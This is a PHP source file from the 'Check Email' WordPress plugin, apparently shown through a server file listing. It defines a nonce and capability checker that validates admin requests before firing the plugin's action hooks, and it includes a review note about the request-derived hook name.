Current File : /var/www/wp-content/plugins/check-email/include/Core/Request/Check_Email_Nonce_Checker.php
<?php namespace CheckEmail\Core\Request;

use CheckEmail\Core\Loadie;
use CheckEmail\Core\UI\Page\Check_Email_Log_List_Page;

defined( 'ABSPATH' ) || exit; // Exit if accessed directly.

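/**
 * Check nonce for all Check Email Log requests.
 *
 * Hooked on `admin_init`. A request is dispatched to the plugin's action hooks
 * only when the current user has the `manage_options` capability and the
 * request carries a valid nonce for the requested action.
 */
class Check_Email_Nonce_Checker implements Loadie {

	/**
	 * Register the nonce check so it runs on every `admin_init`.
	 */
	public function load() {
		add_action( 'admin_init', array( $this, 'check_nonce' ) );
	}

	/**
	 * Validate capability and nonce, then fire the requested action hooks.
	 *
	 * Two request shapes are handled:
	 *  - POST with `check-email-action`: the nonce is read from the field
	 *    `<action>_nonce` and verified against `<action>`.
	 *  - `action` / `action2` (with `-1` in `action` meaning "use action2"):
	 *    only names starting with `check-email-log-list-` or
	 *    `check-email-error-tracker-` are accepted, and the nonce is verified
	 *    against the log list page's nonce constants.
	 *
	 * On success fires `check_email_action` and a hook named after the action.
	 *
	 * @return false|void False when the capability check fails; otherwise nothing.
	 */
	public function check_nonce() {
		// Capability gate comes first: nothing below runs for users without manage_options.
		if ( ! current_user_can( 'manage_options' ) ) {
			return false;
		}

		if ( ! isset( $_POST['check-email-action'] ) && ! isset( $_REQUEST['action'] ) && ! isset( $_REQUEST['action2'] ) ) {
			return;
		}

		if ( isset( $_POST['check-email-action'] ) ) {
			$action = sanitize_text_field( wp_unslash( $_POST['check-email-action'] ) );

			// An empty name would look up the bare `_nonce` field and later fire a
			// hook with an empty name; treat it as "no action requested".
			if ( '' === $action ) {
				return;
			}

			// $action was sanitized at the top of this branch.
			// phpcs:ignore
			if ( ! isset( $_POST[ $action . '_nonce' ] ) ) {
				return;
			}

			// Unslash and sanitize the nonce before verifying it, so a non-string
			// value (e.g. an array parameter) cannot reach wp_verify_nonce().
			// phpcs:ignore
			$nonce = sanitize_text_field( wp_unslash( $_POST[ $action . '_nonce' ] ) );

			if ( ! wp_verify_nonce( $nonce, $action ) ) {
				return;
			}
		}

		if ( isset( $_REQUEST['action'] ) || isset( $_REQUEST['action2'] ) ) {
			// `action` may be absent when only `action2` was sent; reading it
			// unguarded raised an undefined-index warning and silently dropped
			// the request. Treat a missing `action` like the `-1` placeholder.
			$action = isset( $_REQUEST['action'] )
				? sanitize_text_field( wp_unslash( $_REQUEST['action'] ) )
				: '-1';

			if ( '-1' === $action ) {
				if ( ! isset( $_REQUEST['action2'] ) ) {
					return;
				}

				$action = sanitize_text_field( wp_unslash( $_REQUEST['action2'] ) );
			}

			// Prefix allowlist: only this plugin's list-table and error-tracker
			// actions may continue. $action was sanitized just above.
			$is_right_page = strpos( $action, 'check-email-log-list-' ) === 0
				|| strpos( $action, 'check-email-error-tracker-' ) === 0;

			if ( ! $is_right_page ) {
				return;
			}

			if ( ! isset( $_REQUEST[ Check_Email_Log_List_Page::LOG_LIST_ACTION_NONCE_FIELD ] ) ) {
				return;
			}

			// phpcs:ignore
			$nonce = sanitize_text_field( wp_unslash( $_REQUEST[ Check_Email_Log_List_Page::LOG_LIST_ACTION_NONCE_FIELD ] ) );

			if ( ! wp_verify_nonce( $nonce, Check_Email_Log_List_Page::LOG_LIST_ACTION_NONCE ) ) {
				return;
			}
		}

		// NOTE(review): the second hook name below is taken from the request. In the
		// `check-email-action` branch it is constrained only by the nonce check
		// (a valid nonce must exist for that exact name); unlike the list-table
		// branch there is no prefix allowlist. Consider restricting it to the
		// plugin's known action names.
		// Handlers receive the raw $_REQUEST array and must unslash and sanitize
		// every field they read.
		do_action( 'check_email_action', $action, $_REQUEST );
		do_action( $action, $_REQUEST );
	}
}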
